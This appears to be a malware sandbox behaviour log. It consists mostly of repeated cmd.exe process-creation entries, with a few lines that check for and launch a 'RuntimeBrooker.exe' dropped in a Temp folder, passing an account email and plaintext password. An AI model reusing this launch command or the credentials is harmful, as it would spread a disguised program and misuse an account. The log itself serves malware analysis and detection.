Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe "C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "RuntimeBrooker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
